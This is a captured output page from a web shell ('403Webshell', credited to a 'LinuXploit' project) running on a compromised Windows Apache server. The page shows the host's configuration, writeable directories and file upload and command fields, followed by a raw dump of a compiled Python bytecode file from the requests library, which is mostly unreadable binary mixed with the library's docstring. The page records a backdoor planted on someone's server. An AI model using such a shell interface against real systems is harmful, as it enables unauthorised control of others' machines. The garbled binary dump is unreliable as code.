403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.109
Web Server : Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
System : Windows NT DESKTOP-E5T4RUN 10.0 build 19045 (Windows 10) AMD64
User : SERVERWEB ( 0)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  C:/cygwin64/lib/python3.9/site-packages/requests/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : C:/cygwin64/lib/python3.9/site-packages/requests/__pycache__/__init__.cpython-39.pyc
a

��Pec�
@sPdZddlZddlZddlmZzddlmZWneyFdZYn0zddl	mZ
WneyndZ
Yn0dd�Zdd	�Zzeeje
e�Wn.e
efy�e�d
�eje
e�e�Yn0z^zddlZWney�dZYn0eedd��sdd
lmZe��ddlmZee�Wne�y4Yn0ddlmZe�de�ddlZddlmZddlmZmZddlm Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(mZddl)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1ddlm2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;ddl<m=Z=m>Z>m?Z?ddl@mAZAmBZBddlCmDZDe�EeF��Ge��ejde4dd�dS)a�
Requests HTTP Library
~~~~~~~~~~~~~~~~~~~~~

Requests is an HTTP library, written in Python, for human beings.
Basic GET usage:

   >>> import requests
   >>> r = requests.get('https://www.python.org')
   >>> r.status_code
   200
   >>> b'Python is a programming language' in r.content
   True

... or POST:

   >>> payload = dict(key1='value1', key2='value2')
   >>> r = requests.post('https://httpbin.org/post', data=payload)
   >>> print(r.text)
   {
     ...
     "form": {
       "key1": "value1",
       "key2": "value2"
     },
     ...
   }

The other HTTP methods are supported - see `requests.api`. Full documentation
is at <https://requests.readthedocs.io>.

:copyright: (c) 2017 by Kenneth Reitz.
:license: Apache 2.0, see LICENSE for more details.
�N�)�RequestsDependencyWarning)�__version__cCs:|�d�}|dgksJ�t|�dkr.|�d�|\}}}t|�t|�t|�}}}|dks`J�|dkrt|dkstJ�|r�|�d�dd�\}}}t|�t|�t|�}}}d|||fkr�d	ks�nJ�nh|�r.|�d�dd�\}}}t|�t|�t|�}}}d
|||fk�r&dk�s6nJ�ntd��dS)
N�.�dev��0r��)r
rr)�rr)rrr)�rrz7You need either charset_normalizer or chardet installed)�split�len�append�int�	Exception)Zurllib3_version�chardet_version�charset_normalizer_version�major�minor�patch�r�5/usr/lib/python3.9/site-packages/requests/__init__.py�check_compatibility:s$


"&rcCsTzttt|�d���}Wnty,YdS0|gd�krPd�|�}t�|t�dS)Nr)rr
rz4Old version of cryptography ({}) may cause slowdown.)	�list�maprr
�
ValueError�format�warnings�warnr)�cryptography_versionZwarningrrr�_check_cryptographyYs�r!zWurllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported version!ZHAS_SNIF)�	pyopenssl)�DependencyWarning�ignore)�NullHandler)�packages�utils)
�
__author__�__author_email__�	__build__�__cake__�
__copyright__�__description__�__license__�	__title__�__url__r)�delete�get�head�optionsr�post�put�request)
�ConnectionError�ConnectTimeout�FileModeWarning�	HTTPError�JSONDecodeError�ReadTimeout�RequestException�Timeout�TooManyRedirects�URLRequired)�PreparedRequest�Request�Response)�Session�session)�codes�defaultT)r)H�__doc__rZurllib3�
exceptionsrZcharset_normalizerrr�ImportErrorZchardetrrr!�AssertionErrorrrrZssl�getattrZurllib3.contribr"Zinject_into_urllib3Zcryptographyr Zurllib3.exceptionsr#�simplefilterZloggingr%�r&r'r(r)r*r+r,r-r.r/r0Zapir1r2r3r4rr5r6r7r8r9r:r;r<r=r>r?r@rAZmodelsrBrCrDZsessionsrErFZstatus_codesrGZ	getLogger�__name__Z
addHandlerrrrr�<module>sb#

���

0(0

Youez - 2016 - github.com/yon3zu
LinuXploit